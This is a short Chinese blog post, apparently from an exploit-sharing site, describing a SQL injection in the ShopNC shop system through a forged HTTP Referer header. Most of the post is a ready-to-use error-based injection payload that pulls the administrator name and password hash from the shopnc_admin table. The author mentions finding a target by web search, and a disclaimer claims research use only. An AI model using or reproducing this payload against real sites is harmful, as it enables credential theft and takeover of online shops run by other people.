Shopnc 版本有点多啊 都不太记得是哪个了。
ShopNC®天津网城科技有限公司
Copyright© 2007-2009 ShopNC, Powered by ShopNC Team , All Rights Reserved
津ICP备08000171号
百度随便搜了一个。
这个都不用说了。 伪造HTTP头。
/index.php
[php]
referer:http://0day5.com'and(select 1 from(select count(*),concat(floor(rand(0)*2),0x3a,(select(select(SELECT concat(admin_name,0x3a,admin_password)FROM shopnc_admin limit 0,1))from information_schema.tables limit 0,1))x from information_schema.tables group by x)a) and 1=1)#
[/php]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论